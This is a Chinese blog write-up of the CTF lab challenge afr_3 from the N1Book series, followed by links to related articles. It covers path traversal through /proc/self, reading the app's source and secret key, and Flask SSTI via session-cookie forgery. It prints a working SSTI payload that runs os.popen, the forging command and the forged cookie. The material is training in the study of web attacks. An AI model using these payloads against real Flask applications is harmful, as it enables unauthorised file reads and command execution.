《从0到1:CTFer成长之路》配套题目第一章afr_3

最新推荐文章于 2024-08-20 10:53:37 发布
最新推荐文章于 2024-08-20 10:53:37 发布
阅读量2.3k 收藏 6
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Youth____/article/details/111171019
版权

afr_3

这题跟着wp做的,让人头秃
本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入
关于/proc/目录
Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。
/proc/[pid],当查看当前进程的时候可以用/proc/self代替
cmdline — 启动当前进程的完整命令,但僵尸进程目录中的此文件不包含任何信息
cwd — 指向当前进程运行目录的一个符号链接
environ — 当前进程的环境变量列表,彼此间用空字符(NULL)隔开;变量用大写字母表示,其值用小写字母表示
开始
在这里插入图片描述
随便写一个名字
在这里插入图片描述
在这里插入图片描述
有一个name参数,利用这个name参数获取当前执行系统命令

在这里插入图片描述
得到python server.py,然后查看server.py的源代码
在这里插入图片描述
可以看到有个flag.py和key.py
在flag.py中应该是存在flag,但是不能查看

if "n1code" not in session or session['n1code'] is None: session['n1code'] = n1code
template = None
if session['n1code'] is not None:
 template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' %
session['n1code']
session['n1code'] = None
return render_template_string(template)

可以看到这里存在ssti,可以用flask的session伪造获取flag
这里直接就用了别人的

{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}
查看key.py
在这里插入图片描述
伪造

./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

得到

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.X9cMyw.LNLkPxsZMuvjh4nOv6BzncVmDs4

在这里插入图片描述
修改session
在这里插入图片描述在这里插入图片描述
获得flag

Youth____
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
flask-session-cookie-manager-master.zip
08-14
众所周知,flask的session是存储在客户端cookie中的,而且flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,简单的来说就是flask的session具有防伪造性,但是没有加密性,所以我们可以将flask的session进行解码和编码。
N1Book-第一章Web入门-任意文件读取漏洞-afr_3
weixin_40872714的博客
04-03 1242
N1Book-第一章Web入门-任意文件读取漏洞-afr_3 参考文章: https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787 http://elssm.top/2021/11/29/SSTI%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5/ https://www.freebuf.com/articles/web/264088.html
CTF比赛题看任意文件读取的危害
csd_ct的专栏
02-27 2398
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhub 中web afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。 在afr-3中,任意文件读取漏洞如下,首先进入首页,如下图: 点进去,首页是个输入框,输入test,提交查询,如图: 在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url中有个name=article,这个参数,猜测这个参数是突破点,将article.
《从0到1:CTFer成长之路afr_3
ZhShy
01-16 1160
文章目录靶场:afr_3知识点解题过程flag:n1book{afr_3_solved} 靶场:afr_3 知识点 /proc目录 flask之ssti模板注入 flask-session-cookie-manager burpsuite抓包 解题过程 检查首页,在输入框随便输入,并根据引导进入下一个页面 查看URL: http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article 通过
CTF刷题记录Buuctf_N1BOOK——afr_3
m_de_g的博客
06-17 1794
** N1BOOK——afr_3 ** 一、解题思路 1.打开题目发现一个输入框 既然是web题的话,还是先查看页面源代码 就发现使用的是POST的提交方式,没办法,只能看这个框的秘密所在了 2.直接输入1进行查询 页面提示说,你为什么不看我们的文章呢?这里是个出发的按钮,点击 3.又有提示说明,这是一篇示例文章?内心充满了困惑?????? 抬头一看,URL好奇怪 http://80a3f61d-704d-4c38-b615-158bab104673.node3.buuoj.cn/article?
SSTI模板注入
weixin_42739903的博客
01-10 1442
SSTI 漏洞介绍和一些题目案例演示
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
AFR1:改写AFR
03-19
"AFR1:改写AFR"这个标题可能指的是一个特定的VBA项目或模块,其目标是对"AFR"(可能是“非洲”、“空气燃料比”或其他特定术语的缩写)进行重新设计或优化。描述中提到的同样内容,进一步确认了这是一个关于AFR的VBA...
C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习
07-10
使用到的虹软的SDK包中,提供了人脸识别的库,它的名字叫face_recongnition.dll,我们找到它的SDK文档。 来建立各个结构体和API的C#映射。 讲解原始SDK文档中的数据结构和C#数组结构如何映射的,也不再讲解P/Invoke...
HA_AFR20_gnatix
03-04
快速查找工具HA_AFR20_gnatix
c+cgi+mysql+ajax实现web操作mysql
08-29
完成CGI - MYSQL作业: 实现一个MySQL Web 客户端。 通过浏览器操作MySQL。 页面整体布局如下: MySQL Host: (单行输入框) MySQL Port: (单行输入框) MySQL User: (单行输入框) MySQL Pass: (单行输入框) MySQL DB: (单行输入框) SQL 语句: (单行输入框) 总行数: XXXXX 表格显示SQL 结果。 要求: 输入对应的MYSQL SERVER 信息, 然后回显用户执行的 SQL 语句结果。 结果信息应包含: 总行数、 字段名,以及具体的字段内容。要求使用 AJAX,在不刷新整个页面的情况下,展示结果数据。 如果SQL语句执行出错,应给出具体的出错原因。 密码应用星号显示而非明文显示。
实验17 ADC实验.rar_STM32外部adc_combination3dk_stm32 ADC检测_truck9zg
09-21
例如,我们可能选择ADC1的CH0作为外部电压检测口,并根据应用需求设定合适的采样时间,如13个时钟周期,以平衡转换精度和速度。此外,我们还要设置ADC的工作模式,如单次转换或连续转换。 然后,启动ADC转换。在STM...
[第一章 web入门]afr_3
2202_75361164的博客
04-04 828
任意文件读取,session伪造+ssti。 可以发现secret_key在key.py,flag在flag.py里面 并且,/n1page路由下面有ssti注入,注入的数据刚好是session
【无标题】
m0_63756463的博客
11-16 175
ctf菜狗杯,抽老婆复现,详细
【文件读取/包含】任意文件读取漏洞 afr_3
wj33333的博客
11-15 187
任意文件读取漏洞 afr_3
[CTF夺旗赛] BUUCTF N1BOOK 第一章 web入门
最新发布
Da1NtY的博客
08-20 681
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第一章,后续会陆续更新。
BUUCTF afr_31
m0_74167420的博客
04-17 380
使用python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{''.class.mro[2].subclasses()[71].init.globals['os'].popen('cat flag.py').read()}}'}" 进行伪造。(2)name=../../../../../proc/self/cwd/server.py (最后的py文件可以改变)
Flask入门篇(五)cookie和session操作
xiaoxin_OK的博客
08-06 1566
from flask import Flask, session app = Flask(__name__) """cookie操作""" # 设置cookie @app.route("/login_success") def login_success(): response = make_response("login success") response.set_cookie("t", "aaaaa") response.set_cookie("n", "12345",
Flask的安装与使用
BeefpasteC的博客
08-05 468
Flask的介绍 ​ Flask 是python轻量级(微)的web开发框架,相比较django,flask并没有在功能上有所欠缺,只不过更多的选择交给了开发者,如果做一个简单的web开发,比如公司年会内部抽奖系统。假如使用django,那开发者不得不创建一个项目目录,创建一个app,进行settings配置…,但实际上,好多操作是冗余的。使用最少,最贴合项目的文件进行快速的开发,...
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体,用于存储人脸特征数据。该结构体包含两个成员变量:pbFeatur和FeaturSiz。其中,pbFeatur是一个指向人脸特征数据的指针,FeaturSiz是人脸特征数据的长度。通过将人脸图像输入到虹软人脸识别SDK中,可以得到一个AFR_FSDK_FACEMODEL结构体,该结构体中存储了该人脸的特征数据。在进行人脸比对时,只需要将两个人脸的特征数据进行比对即可。\n\
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值